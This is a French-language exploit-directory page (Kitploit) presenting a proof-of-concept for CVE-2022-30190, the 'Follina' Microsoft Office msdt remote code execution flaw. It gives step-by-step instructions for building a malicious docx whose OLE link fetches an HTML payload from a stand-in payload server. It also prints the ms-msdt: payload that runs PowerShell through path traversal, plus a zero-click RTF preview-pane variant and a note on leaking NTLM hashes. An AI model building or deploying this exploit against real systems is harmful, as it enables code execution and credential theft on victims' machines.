Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2022-30190 — POC CVE-2022-30190 : CVE 0-day MS Offic RCE alias msdt follina | Kitploit
Outils/GitHubGitHub/jmousqueton/poc-cve-2022-30190
Outils de PhishingGénération de PayloadsAnalyse des VulnérabilitésExploitationMouvement LatéralExploitation d'Applications WebCommandement et Contrôle
GitHubjmousqueton/poc-cve-2022-30190

PoC-CVE-2022-30190

POC CVE-2022-30190 : CVE 0-day MS Offic RCE alias msdt follina

Voir le dépôt
15752il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC CVE-2022-30190 : CVE 0-day MS Office RCE alias msdt follina

Info : Nouveau zero-day Microsoft Office utilisé dans des attaques pour exécuter PowerShell

Résumé

Le 29 mai 2022, l'équipe Nao_Sec, une équipe indépendante de recherche en cybersécurité, a découvert un document Office malveillant partagé sur Virustotal. Ce document utilise un schéma inhabituel mais connu pour infecter ses victimes. Ce schéma n'a pas été détecté comme malveillant par certains EDR, comme Microsoft Defender for Endpoint. Cette vulnérabilité pourrait conduire à une exécution de code sans nécessiter d'interaction de l'utilisateur, car elle n'implique pas de macros, sauf si le mode Protected View est activé. Aucun numéro CVE n'a encore été attribué.

Détails techniques

La vulnérabilité est exploitée en utilisant le schéma d'URI MSProtocol pour charger du code. Les attaquants peuvent intégrer des liens malveillants dans des documents, modèles ou e-mails Microsoft Office commençant par ms-msdt: qui seront chargés et exécutés par la suite sans interaction de l'utilisateur - sauf si le mode Protected View est activé. Néanmoins, la conversion du document au format RTF pourrait également contourner la fonctionnalité Protected View.

Preuve de concept

Les fichiers docx de MS Office peuvent contenir des références externes d'objets OLE sous forme de fichiers HTML. Il existe un schéma HTML « ms-msdt: » qui invoque l'outil de diagnostic msdt, capable d'exécuter du code arbitraire (spécifié dans les paramètres).

Le résultat est un vecteur d'attaque terrifiant pour obtenir une RCE en ouvrant des fichiers docx malveillants (sans utiliser de macros).

Voici les étapes pour construire un fichier docx de preuve de concept :

  1. Ouvrez Word (version utilisée : 2019 Pro à jour, 16.0.10386.20017), créez un document factice, insérez un objet (OLE) (en tant qu'image Bitmap), enregistrez-le au format docx.

  2. Modifiez word/_rels/document.xml.rels dans la structure du docx (c'est un simple zip). Modifiez la balise XML <Relationship> avec l'attribut

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

et Target="embeddings/oleObject1.bin" en changeant la valeur de Target et en ajoutant l'attribut TargetMode :

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Notez la valeur de l'Id (probablement « rId5 »).

  1. Modifiez word/document.xml. Recherchez la balise <o:OLEObject ..> (avec r:id="rId5") et changez l'attribut de Type="Embed" à Type="Link" et ajoutez l'attribut UpdateMode="OnCall".

NOTE : Le fichier docx malveillant créé est presque le même que pour CVE-2021-44444.

  1. Servez la charge utile HTML du PoC (lanceur calc.exe) avec le schéma ms-msdt à l'adresse http://<payload_server>/payload.html :
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Notez que :

  • la ligne de commentaire avec AAA doit être répétée >60 fois (minimum 4096 octets).
  • Au minimum, deux traversées de répertoire /../ étaient nécessaires au début du paramètre IT_BrowseForFile
  • Le code encapsulé dans $() s'exécuterait via PowerShell, mais les espaces le briseraient
  • « .exe » doit être la dernière chaîne de caractères présente à la fin du paramètre IT_BrowseForFile

De plus, la charge utile déclencheuse peut contacter des emplacements distants. Bien qu'il soit peu probable qu'elle invoque un binaire non fiable, la connexion véhiculera toujours des hachages NTLM (ce qui signifie que les acteurs malveillants possèdent désormais un hachage du mot de passe Windows de la victime) qui pourraient être utilisés par un adversaire pour une post-exploitation ultérieure.

BONUS (version RTF sans clic)

Si vous ajoutez également ces éléments sous l'élément <o:OLEObject> dans word/document.xml à l'étape 3 :

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

alors cela fonctionnera également en RTF (ouvrez le docx résultant et enregistrez-le au format RTF).

Avec le RTF, il n'est pas nécessaire d'ouvrir le fichier dans Word, il suffit de naviguer jusqu'au fichier et de le visualiser dans un volet d'aperçu. Le volet d'aperçu déclenche la charge utile HTML externe et la RCE est là sans aucun clic.

Sources :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (code original)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (informations supplémentaires)
  • https://github.com/JohnHammond/msdt-follina (script)
Télécharger l’outil